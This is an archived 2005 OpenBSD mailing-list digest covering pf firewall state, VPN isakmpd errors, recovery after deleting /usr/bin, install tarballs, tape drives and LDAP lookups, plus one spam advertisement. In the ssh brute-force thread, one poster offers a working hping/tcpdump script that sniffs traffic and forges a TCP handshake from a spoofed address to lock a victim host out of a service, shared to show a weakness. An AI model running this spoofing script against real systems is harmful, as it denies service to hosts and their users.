Re: ssh brute force attacks

[Petr Ruzicka]

Well,
for cizcoeee switches, configuring "DHCP snooping" and "Dynamic ARP
inspection" could help (in order to armor switch against arp poisoning
or dhcp impersonation, ie. to be better protected against sniffing on
switch).

P.
On 11/14/05, bofh <[EMAIL PROTECTED]> wrote:
> On 11/13/05, Joachim Schipper <[EMAIL PROTECTED]> wrote:
> >
> > This is an attack against TCP, not SSH. TCP is not encrypted (usually -
> > IPSec or somesuch, with the proper settings, could make this impossible)
> > - all that's required is some sequence numbers.
> >
> > And yes, a really good switch configured by something who really knows
> > what he's doing will protect you from this. Fail either, and there's
>
>
>
> Hi,
> what kind of config is needed? Just curious, thanx.
>
> -Tai
>
>


--
"Security is decided by quality" -- Theo de Raadt

Re: pf keep state on 3.8

[jimmy]

Quoting Jim Razmus <[EMAIL PROTECTED]>:

> * Jimmy Scott <[EMAIL PROTECTED]> [051113 12:35]:
> > Hi misc@,
> >
> > I finaly had some time to rearrange my network, and split it into 3
> > parts: LAN, DMZ, WAN.
> >
> > Basicly, the LAN (172.20) may not access the DMZ (172.16), but host
> > 172.20.1.10 can. the DMZ may not access the LAN, and both can go to the
> > WAN.
> >
> > But for some reason, when I create state from 172.20.1.10 to 172.16.x.x;
> > the packet comming back gets blocked which should not happen because the
> > state would be checked first and the state really is created?!
> >
> > I tried setting 'set state-policy floating' explicit, but no advance.
> > Someone who knows what the problem is here? I had a ruleset with a bunch
> > of 'quick' rules before instead of this, but had the same problem.
> >
> > [diagnostics snipped]
> >
>
> I think you might have the concept of "in" and "out" rules confused.
> Visualize yourself sitting in the computer between the three interfaces.
> From that perspective, "in" rules mean a packet coming from a remote
> host to you through one of those interfaces.  Conversely "out" rules
> mean a packet leaving from the local machine to some remote host.
>
> Give something like this a whirl for starters.  Caution, I have not
> tested these!  You also likely need to allow packets from the Internet
> into your DMZ.
>
> # pf.conf
> [proposed firewall rules snipped]
>
>
> HTH,
> Jim
>
>

Aah, I see what I did wrong, since I used in the passed 'pass all on sis2',
I never realized that state creation on an 'in' will only match an 'out'
for traffic in the other direction right? So for traffic from sis2 to sis1
I will need to create states on the 'in' of sis2 and states on the 'out' of
sis1 if I got it right.

Also thanks for your example, I will take a look at it later when I'm back
home to figure things out.

Kind regards,
Jimmy Scott




This message has been sent through ihosting.be
To report spamming or other unaccepted behavior
by a iHosting customer, please send a message 
to [EMAIL PROTECTED]

Re: Slow DVD Speed

[steven mestdagh]

On Wed, Nov 09, 2005 at 10:40:16PM -0800, Dan Smythe wrote:
> I am having slow DVD burning speeds. I am running
> OpenBSD 3.6 Release.

try 3.8 instead!

> I'm getting speeds of about 0.2x. I will attach my
> dmesg file. What should I do to fix this problem?
> 
> [demime 1.01d removed an attachment of type application/octet-stream which 
> had a name of dmesg.boot]

if your problem persists with 3.8, try again by posting your dmesg and any
other relevant info in-line (not as attachment).

-- 
steven

Disclaimer: http://www.kuleuven.be/cwis/email_disclaimer.htm

Re: src.tar.gz vs sys.tar.gz

[Greg Thomas]

On 11/13/05, Nick Holland <[EMAIL PROTECTED]> wrote:
>
> Greg Thomas wrote:
> > Ok, it's been awhile since I've seen a message explaining what's in
> > src.tar.gz and sys.tar.gz. I know Nick and a few people have sent
> messages
> > to the list explaining what is in each but I haven't found the messages.
> >
> >>From looking at the two is src.tar.gz the source for the whole release?
> And
> > sys.tar.gz just the kernel?
>
> erf. Seems harder to find than it should be, perhaps. However, using
> the search box in the front page does answer the question, so I don't
> feel TOO guilty... :)



Oops, I've never used it.

http://www.openbsd.org/anoncvs.html
> http://www.openbsd.org/ftp.html
> (should be in faq5.html, but isn't currently)
>
> both describe 'em:
> sys.tar.gz is the kernel source files
> src.tar.gz is the REST of the userland files
>
> if you want to build the whole thing, you need BOTH.
>
> They are broken up on the FTP servers as some people with limited
> bandwidth would only need to customize the kernel, and wouldn't care
> about the userland. On the CDROM (paranoia is setting in, I don't have
> my CD handy, so maybe I'm wrong), there is only one, containing
> everything, since downloading isn't an issue.



Ah, that's what was throwing me off. I grabbed src.tar.gz from CD and saw
everything in /usr/src/sys so was just a little confused.

Installed 3.8 on this IBM T20 I found at work and I'm digging it more than
my Dell Latitude D600 even though it's 3 years older. apm works, which is
more than I can say for ACPI on the Dell, and the IBM keyboard feels
waay better, plus the track stick/pencil eraser/whatever it's
called on the IBM doesn't get stuck scrolling off the side of the screen the
like the Dell's does.

Thanks!

Greg

American Business Database Availabe

[Info]

Canada Books
26 Bellevue
Lac Guindon
Qc, Canada
J0R 1B0

Press Release

The "American Business Database" is now available. This 
database contains more than 25 million business leads.

Our fully importable database is the perfect entrepreneurs and 
marketing professionals to quickly gain access to a wealth of 
information to start a direct marketing campaign.

The American Business Database is excellent for direct mail 
marketing campaigns, fax boroadcasting, finding new supliers, 
 distributors or manufacturers for your products/services. It is 
also a great source of leads for sales/telemarketing campaigns.

You can freely import the text file to your favorite software such 
as Avery Label, Winfax, Filemaker, Act, Goldmine, MS office or 
any other database software and spreadsheet.

What it contains:

-Company name
-Full mailing address
-Telephone number
-Fax number (When available)
-Industry category

The database is sold for $199.95
To place your order call: 450-224-9275


If you do not wish to receive communication from us in the future 
please write "nop" in the subject line to: [EMAIL PROTECTED]

Re: nsswitch

[Tony Lambiris]

probably not -- but we use ldap here at work, and the auth_ldap in the 
ports tree works great.


Aiko Barz wrote:

I googled, but I couldn't figure out the current status.

My problem:
I tried to move my mailservers from Linux to OpenBSD. It's a qmail-ldap
system with its users stored in OpenLDAP. Each of my users has its own
UID. There is only one troublemaker: maildrop. It depends on getpwuid
and getpwnam. But OpenBSD doesn't know anything about my LDAP-users.

Solution:
There are some solutions. maildrop could lookup the account data
directly before invoking getpwuid and getpwnam. (I prefer not to write
this patch. It ends up in courier-authlib and so on.) The dirty hack is
to use the environment variables which are provided by qmail-local
($USER, $HOME). (This is safe for me because chuid gets called before
executing maildrop. I'm not happy with this solution.)

Another solution would be something like nsswitch. Are there any plans
to implement something like this?

Bye,
Aiko

Re: quagga woes

[Bob DeBolt]

I use it fine on 3.8, fresh cvs update for everything stable.

Bob D

Re: src.tar.gz vs sys.tar.gz

[Nick Holland]

Greg Thomas wrote:
> Ok, it's been awhile since I've seen a message explaining what's in
> src.tar.gz and sys.tar.gz. I know Nick and a few people have sent messages
> to the list explaining what is in each but I haven't found the messages.
> 
>>From looking at the two is src.tar.gz the source for the whole release? And
> sys.tar.gz just the kernel?

erf.  Seems harder to find than it should be, perhaps.  However, using
the search box in the front page does answer the question, so I don't
feel TOO guilty... :)

  http://www.openbsd.org/anoncvs.html
  http://www.openbsd.org/ftp.html
(should be in faq5.html, but isn't currently)

both describe 'em:
   sys.tar.gz is the kernel source files
   src.tar.gz is the REST of the userland files

if you want to build the whole thing, you need BOTH.

They are broken up on the FTP servers as some people with limited
bandwidth would only need to customize the kernel, and wouldn't care
about the userland.  On the CDROM (paranoia is setting in, I don't have
my CD handy, so maybe I'm wrong), there is only one, containing
everything, since downloading isn't an issue.

Nick.

Problem with ISAKMPD

[James Mackinnon]

Hey everyone

I am hoping I am posting this to the correct list

I am running an AMD 2200+ w/ 512mb of ram and all intel pro cards in my main
location.

I have 14 other locations connecting back to this 1 location and each location
creates 3 tunnels to this system as I have
3 internal network segments I want available via VPN

Platforms are:

Main system: OpenBSD 3.7 Stable
Remote locations: OpenBSD 3.5 and some OpenBSD 3.7

at first, all locations come up fine, but then in approx 1 hour, 3 units stop
communicating to the main firewall.

They all have the same config (minor changes based on location and assigned
ips of course).

I was planning to finally get rid of my main checkpoint box and complete my
migration to BSD but I had to revert back do to lack of time i had left to go
back in case of an issue.


My Main location is on Fiber
All branches on DSL (pretty much same provider)

My main location has approx 50VPN Connection entries in it.
My Branches connect to 3 VPN's.

Example branch isakmpd.conf file

[Phase 1]
12.12.12.12= peer-loc1
13.13.13.13= peer-loc2
14.14.14.14= peer-loc3


[Phase 2]
Connections=LOC1-SEG1, LOC1-SEG2, LOC1-SEG3, LOC2-SEG1, LOC3-SEG1

[peer-loc1]
Phase=  1
Transport=  udp
Address=12.12.12.12
Configuration=  Default-main-mode
Authentication= MYSUPERPASS

[peer-loc2]
Phase=  1
Transport=  udp
Address=13.13.13.13
Configuration=  Default-main-mode
Authentication= MYSUPERPASS

[peer-loc3]
Phase=  1
Transport=  udp
Address=14.14.14.14
Configuration=  Default-main-mode
Authentication= MYSUPERPASS

[LOC1-SEG1]
Phase=  2
ISAKMP-peer=peer-loc1
Configuration=  Default-quick-mode
Local-ID=   Loc-Network
Remote-ID=  loc1-seg1-Network

[LOC1-SEG2]
Phase=  2
ISAKMP-peer=peer-loc1
Configuration=  Default-quick-mode
Local-ID=   Loc-Network
Remote-ID=  loc1-seg2-Network

[LOC1-SEG3]
Phase=  2
ISAKMP-peer=peer-loc1
Configuration=  Default-quick-mode
Local-ID=   Loc-Network
Remote-ID=  loc1-seg3-Network

[LOC2-SEG1]
Phase=  2
ISAKMP-peer=peer-loc2
Configuration=  Default-quick-mode
Local-ID=   Loc-Network
Remote-ID=  loc2-seg1-Network

[LOC3-SEG1]
Phase=  2
ISAKMP-peer=peer-loc3
configuration=  Default-quick-mode
Local-ID=   Loc-Network
Remote-ID=  loc3-seg1-Network

[loc1-seg1-Network]
ID-type=IPV4_ADDR_SUBNET
Network=10.20.22.0
Netmask=255.255.255.0

[loc1-seg2-Network]
ID-type=IPV4_ADDR_SUBNET
Network=10.20.23.0
Netmask=255.255.255.0

[loc1-seg3-Network]
ID-type=IPV4_ADDR_SUBNET
Network=10.20.24.0
Netmask=255.255.255.0

[loc2-seg1-Network]
ID-type=IPV4_ADDR_SUBNET
Network=10.20.21.0
Netmask=255.255.255.0

[loc3-seg1-Network]
ID-type=IPV4_ADDR_SUBNET
Network=10.20.20.0
Netmask=255.255.255.0


[Loc-Network]
ID-type=IPV4_ADDR_SUBNET
Network=10.20.25.0
Netmask=255.255.255.0

[Default-main-mode]
DOI=IPSEC
EXCHANGE_TYPE=  ID_PROT
Transforms= 3DES-SHA

[Default-quick-mode]
DOI=IPSEC
EXCHANGE_TYPE=  QUICK_MODE
Suites= QM-ESP-3DES-SHA-SUITE


My isakmpd.policy file

Keynote-version: 2
Authorizer: "POLICY"
Conditions: app_domain == "IPsec policy" &&
esp_present == "yes" &&
esp_enc_alg != "null" -> "true";




I have run isakmpd -L , which I am still reviewing but most errors are below

Nov 13 04:01:14 fw2 isakmpd[16014]: transport_send_messages: giving up on
message 0x3c066800, exchange fw01
Nov 13 04:01:14 fw2 isakmpd[16014]: transport_send_messages: either this
message did not reach the other peer
Nov 13 04:01:14 fw2 isakmpd[16014]: transport_send_messages: or the
responsemessage did not reach us back

Nov 13 05:41:46 fw2 isakmpd[16014]: dropped message from fw01 port 500 due to
notification type PAYLOAD_MALFORMED
Nov 13 05:41:46 fw2 isakmpd[16014]: message_parse_payloads: reserved field
non-zero: ca
Nov 13 05:41:46 fw2 isakmpd[16014]: dropped message from fw01 port 500 due to
notification type PAYLOAD_MALFORMED
Nov 13 21:09:52 fw2 isakmpd[3312]: message_recv: invalid cookie(s)
8710be0bf45687ff 482bbdaf5287d3db
Nov 13 21:09:52 fw2 isakmpd[3312]: dropped message from fw01 port 57834 due to
notification type INVALID_COOKIE
Nov 13 21:11:41 fw2 isakmpd[12205]: message_recv: invalid cookie(s)
91bd63a6716685f7 439a07ad7e83a2e6
Nov 13 21:11:41 fw2 isakmpd[12205]: dropped message from fw01 port 500 due to
notification type INVALID_COOKIE



I am lost at this point because the layout is the same, for all firewalls
including the PF config as I built a generic config and deploy to them all

oh, also, My remote firewalls are running approx 200 states and my main one is
running approx 6000-8000 states, and this is durning low business times, high
business count is hard to determine at this point but I am guessing approx
2-4

Anyhow, any suggestions here would be great as it stands right now, I am back
on checkpoint and I am 

nsswitch

[Aiko Barz]

I googled, but I couldn't figure out the current status.

My problem:
I tried to move my mailservers from Linux to OpenBSD. It's a qmail-ldap
system with its users stored in OpenLDAP. Each of my users has its own
UID. There is only one troublemaker: maildrop. It depends on getpwuid
and getpwnam. But OpenBSD doesn't know anything about my LDAP-users.

Solution:
There are some solutions. maildrop could lookup the account data
directly before invoking getpwuid and getpwnam. (I prefer not to write
this patch. It ends up in courier-authlib and so on.) The dirty hack is
to use the environment variables which are provided by qmail-local
($USER, $HOME). (This is safe for me because chuid gets called before
executing maildrop. I'm not happy with this solution.)

Another solution would be something like nsswitch. Are there any plans
to implement something like this?

Bye,
Aiko
-- 
Aiko Barz <[EMAIL PROTECTED]>
Web: http://www.haeckser.de

Re: ssh brute force attacks

[bofh]

On 11/13/05, Joachim Schipper <[EMAIL PROTECTED]> wrote:
>
> This is an attack against TCP, not SSH. TCP is not encrypted (usually -
> IPSec or somesuch, with the proper settings, could make this impossible)
> - all that's required is some sequence numbers.
>
> And yes, a really good switch configured by something who really knows
> what he's doing will protect you from this. Fail either, and there's



Hi,
what kind of config is needed? Just curious, thanx.

-Tai

Re: uh oh, accidently deleted /usr/bin

[Nick Holland]

b h wrote:
> Hi
> Okay, I feel really stupid, but that's beside the
> point.  I need to be able to recover this machine. 
> It's running current built from src as of November 7.
> 
> I was brilliantly removing my src directory with a rm
> -rf * to get a completely fresh tree, when I realized
> I was a directory too high, running that command from
> /usr  after immediately stopping it, I noticed the
> bin directory gone (and I figure there is some missing
> from the dest directory too -- this is all presuming
> that rm -rf goes alphabetically)...

dangerous assumption.  I'm not sure you are wrong, but I don't know that
you are right, either.  I'm thinking I've seen evidence that under some
conditions, it does not sort them.  But someone will probably tell me
I'm wrong. :)

> 
> what is my best bet here?  The system is still up and
> running.  I presume it is to get some of the install
> sets and unpack them -- I would rather *not* like to
> do a reinstall.  Which install sets do I need
> (presuming from the most recent snapshot, following
> instructions from 4.10 of FAQ).  I figure I need 
> 
> comp38.tgz
> base38.tgz
> misc38.tgz

basically, yes.
Depends on if /usr/local got hit at all.

> Maybe I don't need all three of these?

Why are you trying to do the absolute minimum?  There is NO point.

IF you installed from snapshot or tarballs you made and still have,
install ALL of them except for etc38.tgz.  Then you are probably done.

As you say you upgraded from source, you probably don't have the *.tgz
files that match your existing system, I'd just grab the -current
snapshot, and install that over your existing install, again, all file
sets other than etc38.tgz and xetc38.tgz, and the new kernels.  Done.

If you use any other file sets, you will end up with a "mixed" system --
it might work, it might blow up in your face, probably something between
the two.  Just do it right.

> Anything else
> or other gotchas I should look out for?  Can I safely
> reboot after untarring the above?  Then after that I
> presume I can safely build from a newly checked out
> src again (being more careful)?

Just install the snapshot.  Stop.
You don't need to build it from source.

You will probably need to boot from a bsd.rd kernel, as you probably
killed /usr/bin/gzip (and ftp, and ...), needed to unpack the tgz
files...just say "upgrade", pull down pub/OpenBSD/snapshots/,
from your favorite mirror, it will unpack what you need where you need
it, and not break what is currently there.

Actually, were I to guess, your bsd.rd is probably old, you didn't
rebuild that, did you?  So you probably need to get a -current bsd.rd on
the system to do a good upgrade.

boot off your bsd.rd, chose upgrade, wait until it sets up your network.
 Drop to shell, make sure you have / mounted on /mnt (or wherever), and
ftp a new bsd.rd.  Now, reboot off that one, otherwise you will have a
failure when you try to rebuild /dev.  Probably not a fatal error, you
could probably reboot after the upgrade successfully and "MAKEDEV all".

See?  Would have been easier to upgrade via snap...you would have a more
-current bsd.rd. :)

Nick.

src.tar.gz vs sys.tar.gz

[Greg Thomas]

Ok, it's been awhile since I've seen a message explaining what's in
src.tar.gz and sys.tar.gz. I know Nick and a few people have sent messages
to the list explaining what is in each but I haven't found the messages.

>From looking at the two is src.tar.gz the source for the whole release? And
sys.tar.gz just the kernel?

Thanks,
Greg

Re: uh oh, accidently deleted /usr/bin

[David Hill]

On Sun, Nov 13, 2005 at 02:16:07PM -0800, b h wrote:
> Hi
> Okay, I feel really stupid, but that's beside the
> point.  I need to be able to recover this machine. 
> It's running current built from src as of November 7.
> 
> I was brilliantly removing my src directory with a rm
> -rf * to get a completely fresh tree, when I realized
> I was a directory too high, running that command from
> /usr  after immediately stopping it, I noticed the
> bin directory gone (and I figure there is some missing
> from the dest directory too -- this is all presuming
> that rm -rf goes alphabetically)...
> 
> what is my best bet here?  The system is still up and
> running.  I presume it is to get some of the install
> sets and unpack them -- I would rather *not* like to
> do a reinstall.  Which install sets do I need
> (presuming from the most recent snapshot, following
> instructions from 4.10 of FAQ).  I figure I need 
> 
> comp38.tgz
> base38.tgz
> misc38.tgz
> 
> Maybe I don't need all three of these?  Anything else
> or other gotchas I should look out for?  Can I safely
> reboot after untarring the above?  Then after that I
> presume I can safely build from a newly checked out
> src again (being more careful)?
> 
> much thanks
> b
> 
> 
>   
> __ 
> Start your day with Yahoo! - Make it your home page! 
> http://www.yahoo.com/r/hs
> 

You will also need the newer bsd kernel as well making sure you keep
the kernel and userland in sync.

uh oh, accidently deleted /usr/bin

[b h]

Hi
Okay, I feel really stupid, but that's beside the
point.  I need to be able to recover this machine. 
It's running current built from src as of November 7.

I was brilliantly removing my src directory with a rm
-rf * to get a completely fresh tree, when I realized
I was a directory too high, running that command from
/usr  after immediately stopping it, I noticed the
bin directory gone (and I figure there is some missing
from the dest directory too -- this is all presuming
that rm -rf goes alphabetically)...

what is my best bet here?  The system is still up and
running.  I presume it is to get some of the install
sets and unpack them -- I would rather *not* like to
do a reinstall.  Which install sets do I need
(presuming from the most recent snapshot, following
instructions from 4.10 of FAQ).  I figure I need 

comp38.tgz
base38.tgz
misc38.tgz

Maybe I don't need all three of these?  Anything else
or other gotchas I should look out for?  Can I safely
reboot after untarring the above?  Then after that I
presume I can safely build from a newly checked out
src again (being more careful)?

much thanks
b



__ 
Start your day with Yahoo! - Make it your home page! 
http://www.yahoo.com/r/hs

Re: SCSI config for HP SureStore tape drive

[Steve Harding]

For the archives - I borrowed a different HP drive, and it came up in 
the dmesg as it should have. Looks like my SureStore is junk.


Steve Harding wrote:

I recently installed a SCSI card and an external HP SureStore 24G tape 
drive, and am unable to access it. By reading lots of man pages, it 
appears that I need to configure /dev/rst0 so that it knows what is 
hooked to the SCSI port, but I have no clue how to do it. Worse, I 
have this feeling that it is something so fundamental that any 
knucklehead should be able to figure it out. I have googled, and read 
what I think are all of the applicable man pages, no luck.


When I attempt to write to the tape I get:

$ dump -0au /pub/etc36/
DUMP: Ignoring u flag for subdir dump
DUMP: Dumping sub files/directories from /pub
DUMP: Dumping file/directory /pub/etc36/
DUMP: Date of this level 0 dump: Thu Oct 13 19:37:27 2005
DUMP: Date of last level 0 dump: the epoch
DUMP: Dumping /dev/rwd0j (/pub) to /dev/rst0
DUMP: mapping (Pass I) [regular files]
DUMP: mapping (Pass II) [directories]
DUMP: estimated 5606 tape blocks.
DUMP: Cannot open output "/dev/rst0".
DUMP: Do you want to retry the open?: ("yes" or "no")

Dmesg  follows, any help would be appreciated.
Steve

OpenBSD 3.7 (GENERIC.MP) #50: Sun Mar 20 00:17:19 MST 2005
  [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC.MP
cpu0: AMD Athlon(tm) MP 2000+ ("AuthenticAMD" 686-class) 1.67 GHz
cpu0:
FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,MMX,FXSR,SSE 


real mem  = 1073258496 (1048104K)
avail mem = 972795904 (949996K)
using 4278 buffers containing 53764096 bytes (52504K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(f6) BIOS, date 03/05/02, BIOS32 rev. 0 @ 
0xfb100

apm0 at bios0: Power Management spec V1.2
apm0: AC on, battery charge unknown
pcibios0 at bios0: rev 2.1 @ 0xf/0xdf94
pcibios0: PCI IRQ Routing Table rev 1.0 @ 0xfdec0/208 (11 entries)
pcibios0: PCI Exclusive IRQs: 5 11
pcibios0: no compatible PCI ICU found
pcibios0: Warning, unable to fix up PCI interrupt routing
pcibios0: PCI bus #2 is the last bus
bios0: ROM list: 0xc/0xa800 0xcc000/0x2800 0xcf000/0x1800
mainbus0: Intel MP Specification (Version 1.4) (OEM0 PROD)
cpu0 at mainbus0: apid 0 (boot processor)
k7_powernow: couldn't map BIOS
cpu0: apic clock running at 266 MHz
cpu1 at mainbus0: apid 1 (application processor)
cpu1: AMD Athlon(tm) MP 2000+ ("AuthenticAMD" 686-class) 1.67 GHz
cpu1: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV
mainbus0: bus 0 is type PCI
mainbus0: bus 1 is type PCI
mainbus0: bus 2 is type PCI
mainbus0: bus 3 is type ISA
ioapic0 at mainbus0: apid 2 pa 0xfec0, version 11, 24 pins
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "AMD 762 PCI" rev 0x11
ppb0 at pci0 dev 1 function 0 "AMD 762 PCI-PCI" rev 0x00
pci1 at ppb0 bus 1
vga1 at pci1 dev 5 function 0 "Nvidia Vanta" rev 0x15
wsdisplay0 at vga1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
pcib0 at pci0 dev 7 function 0 "AMD 768 ISA" rev 0x05
pciide0 at pci0 dev 7 function 1 "AMD 768 IDE" rev 0x04: DMA, channel 0
configured to compatibility, channel 1 configured to compatibility
wd0 at pciide0 channel 0 drive 0: 
wd0: 16-sector PIO, LBA48, 38166MB, 78165360 sectors
wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 5
pciide0: channel 1 disabled (no drives)
"AMD 768 Power Mgmt" rev 0x03 at pci0 dev 7 function 3 not configured
auich0 at pci0 dev 7 function 5 "AMD 768 AC97" rev 0x03: apic 2 int 17
(irq 11), AMD768 AC97
ac97: codec id 0x49434511 (ICEnsemble ICE1232)
ac97: codec features headphone, 18 bit DAC, 18 bit ADC, KS Waves 3D
audio0 at auich0
ahc1 at pci0 dev 9 function 0 "Adaptec AHA-29160 U160" rev 0x02: apic 2
int 17 (irq 11)
scsibus0 at ahc1: 16 targets
ppb1 at pci0 dev 16 function 0 "AMD 768 PCI-PCI" rev 0x05
pci2 at ppb1 bus 2
ohci0 at pci2 dev 0 function 0 "AMD 768 USB" rev 0x07: apic 2 int 19
(irq 5), version 1.0, legacy support
usb0 at ohci0: USB revision 1.0
uhub0 at usb0
uhub0: AMD OHCI root hub, class 9/0, rev 1.00/1.00, addr 1
uhub0: 4 ports with 4 removable, self powered
pciide1 at pci2 dev 4 function 0 "Promise PDC20269" rev 0x02: DMA,
channel 0 configured to native-PCI, channel 1 configured to native-PCI
pciide1: using apic 2 int 16 (irq 5) for native-PCI interrupt
wd1 at pciide1 channel 0 drive 0: 
wd1: 16-sector PIO, LBA48, 239372MB, 490234752 sectors
wd2 at pciide1 channel 0 drive 1: 
wd2: 16-sector PIO, LBA48, 238475MB, 488397168 sectors
wd1(pciide1:0:0): using PIO mode 4, Ultra-DMA mode 6
wd2(pciide1:0:1): using PIO mode 4, Ultra-DMA mode 5
wd3 at pciide1 channel 1 drive 0: 
wd3: 16-sector PIO, LBA48, 286168MB, 586072368 sectors
wd3(pciide1:1:0): using PIO mode 4, Ultra-DMA mode 5
em0 at pci2 dev 6 function 0 "Intel PRO/1000MT (82540EM)" rev 0x02: apic
2 int 18 (irq 11), address: 00:0e:0c:06:b6:ea
fxp0 at pci2 dev 9 function 0 "Intel 82559ER" rev 0x09, i82559S: apic 2
int 17 (irq 11), addres

Re: ssh brute force attacks

[Joachim Schipper]

On Sat, Nov 12, 2005 at 10:16:05AM -0500, Melameth, Daniel D. wrote:
> Joachim Schipper wrote:


> Perhaps I missed something in this thread, but what are you talking
> about?  This is why you run SSH and not telnet--so that traffic sniffing
> doesn't reveal the contents of the packets.  Also, quality manageable
> switches can (and should) be configured so that overloading their MAC
> table is pretty much impossible.

This is an attack against TCP, not SSH. TCP is not encrypted (usually -
IPSec or somesuch, with the proper settings, could make this impossible)
- all that's required is some sequence numbers.

And yes, a really good switch configured by something who really knows
what he's doing will protect you from this. Fail either, and there's
likely to be a way around it - and if both conditions are satisfied,
chances are you don't need to ask about ssh probes on some mailing list.
;-)

> > Methinks a combination of sniffing the return traffic (SYN/ACK) and
> > forging the response is enough (this is assuming the spoofed host does
> > not return a RST for nonsense SYN/ACKs - I'm fairly certain that
> > there's a way around that too, most likely just racing the gateway,
> > but that would complicate matters unnecessarily).
> 
> Again I'm not certain what you are getting at here.  Perhaps it's too
> early and I'm missing something, but this is another reason why one
> would run OpenBSD as the TCP stack does a lot of bounds checking and
> randomization which makes these attacks more difficult.  In addition to
> this, SSH performs cryptographic session integrity.  As for the gateway,
> it really has little to do with an SSH session between two hosts.

Yes, you are right that doing a blind attack of this sort would be
difficult due to OpenBSD's randomizations. That's why I propose not
doing a blind attack, i.e. sniffing the connection.

And you are right about the gateway, of course. Oops.

> > I'm thinking of a couple of hosts, attached to a hub (or 'hubbable'
> > switch).
> > 
> > If this attack really doesn't work, well, I'll be happy to learn
> > something new and/or Read Some More FMP... but in the meanwhile, I can
> > live with the log entries.
> > 
> > (Of course, the real Braindead Error above was me seemingly thinking
> > that dropping the default gateway would help. Instead, drop some
> > other, more interesting host.)

Consider something like the following script. It's tested a little, and
appears to work on my two OpenBSD 3.8 machines, running IPv4 on a hub.
(Sadly, lack of a suitable third machine makes testing a little
awkward.)

It requires security/hping. It also depends on the machine being spoofed
not returning RSTs for nonsense (SYN/)ACKs, and the machine being used
being able to sniff the traffic between the alleged sender and the
victim.  Simply returning ACKs is not sufficient protection; a better -
C - implementation could try to outrun the ACKs. I haven't tested this,
but I believe this would allow essentially the same thing to happen.

(Note that the script does not spoof arp, so a nonexistent host on the
local network isn't going to be spoofable.)

It opens a TCP connection from $SOURCE_IP:$SOURCE_PORT to
$VICTIM_IP:$VICTIM_PORT. It does not close this, which means the
connection stays open until timeout. Given a sufficiently low limit on
connections, it can block $VICTIM_IP from accessing the specified
service.

Again, note that this is an implementation problem - a well-optimized,
multithreaded or forked implementation could block quite a few hosts in
a couple of minutes.

(Please note that the script is not wrapped. Sorry!)

** START SCRIPT **
#!/bin/sh
SOURCE_IP=192.168.0.2
# Pseudo-random
SOURCE_PORT=$( $$ + 2048 ))
VICTIM_IP=192.168.0.3
VICTIM_PORT=22

TMP=`mktemp /tmp/killer.tmp.` || exit 1
DEBUG=`mktemp /tmp/killer.debug.` || exit 1

tcpdump -Sw $TMP host $VICTIM_IP and port $VICTIM_PORT &

TCPDUMP_PID=$!

MYSEQ=$$

# Allow tcpdump time to start
sleep 3

# SYN
hping -Ss $SOURCE_PORT -a $SOURCE_IP -p $VICTIM_PORT -M $MYSEQ -c 1 $VICTIM_IP 
>$DEBUG 2>&1

# Wait for tcpdump, parse SYN/ACK
sleep 2
# 18:45:07.977176 192.168.0.5.37 > 192.168.0.2.22171: S [tcp sum ok] 
2083463336:2083463336(0) ack 1914314338 win 16384  (DF) 
(ttl 64, id 37179, len 64)
PARSEME=`tcpdump -vvvnr $TMP | tee out2 | sed -ne "s/.* 
$VICTIM_IP\.$VICTIM_PORT > $SOURCE_IP\.$SOURCE_PORT: S \[tcp sum ok\] 
\([0-9]*\):\1(0) ack \([0-9]*\) .*/\1 \2/p"`

if [ "x$PARSEME" = "x" ]; then
echo "Parsing SYN/ACK failed. Sorry" >&2
exit 1
fi

RSEQ=`echo $PARSEME | awk '{print $1}'`
RSEQ=$(( $RSEQ + 1 ))
MYSEQ=`echo $PARSEME | awk '{print $2}'`

# Send ACK
echo "ACKing, now expecting $RSEQ"
hping -As $SOURCE_PORT -a $SOURCE_IP -p $VICTIM_PORT -M $MYSEQ -L $RSEQ -c 1 
$VICTIM_IP >>$DEBUG 2>&1
MYSEQ=$(( $MYSEQ + 1 ))

# Wait for tcpdump, parse 
# Give tcpdump time to finish
sleep 1
kill $TCPDUMP_PID
wait

# Debugging mode
#echo $TMP
#echo $DEBUG
rm -f $TMP $DEBUG

# Sample TCP connection - no

Re: pf keep state on 3.8

[Jim Razmus]

* Jimmy Scott <[EMAIL PROTECTED]> [051113 12:35]:
> Hi misc@,
> 
> I finaly had some time to rearrange my network, and split it into 3
> parts: LAN, DMZ, WAN.
> 
> Basicly, the LAN (172.20) may not access the DMZ (172.16), but host
> 172.20.1.10 can. the DMZ may not access the LAN, and both can go to the
> WAN.
> 
> But for some reason, when I create state from 172.20.1.10 to 172.16.x.x;
> the packet comming back gets blocked which should not happen because the
> state would be checked first and the state really is created?!
> 
> I tried setting 'set state-policy floating' explicit, but no advance.
> Someone who knows what the problem is here? I had a ruleset with a bunch
> of 'quick' rules before instead of this, but had the same problem.
> 
> tcpdump on pflog:
> 18:12:16.483526 rule 12/(match) pass in on sis2: 172.20.1.10.57132 >
> 172.16.0.5.ssh: [|tcp]
> 18:12:16.483960 rule 21/(match) block in on sis1: 172.16.0.5.ssh >
> 172.20.1.10.57132: [|tcp]
> 
> 
> grep on state:
> # pfctl -s state|grep 172.16.0.5
> all tcp 172.16.0.5:22 <- 172.20.1.10:57132   CLOSED:SYN_SENT
> 
> 
> kernel:
> OpenBSD 3.8 (GENERIC) #138: Sat Sep 10 15:41:37 MDT 2005
> [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
> 
> rules:
> scrub in all no-df fragment reassemble
> scrub out all no-df random-id fragment reassemble
> block drop in log all
> block drop log inet6 all
> block drop in log quick on sis0 from any to (sis0:broadcast)
> block drop in log quick on sis0 from  to any
> pass log quick on lo0 inet from 127.0.0.0/8 to any
> pass log quick on lo0 inet6 from ::1 to any
> pass in log on sis2 inet proto tcp from 172.20.0.0/16 to any modulate state
> pass in log on sis2 inet proto udp from 172.20.0.0/16 to any keep state
> pass in log on sis2 inet proto icmp from 172.20.0.0/16 to any keep state
> block drop in log on sis2 inet proto tcp from any to 172.16.0.0/16
> block drop in log on sis2 inet proto udp from any to 172.16.0.0/16
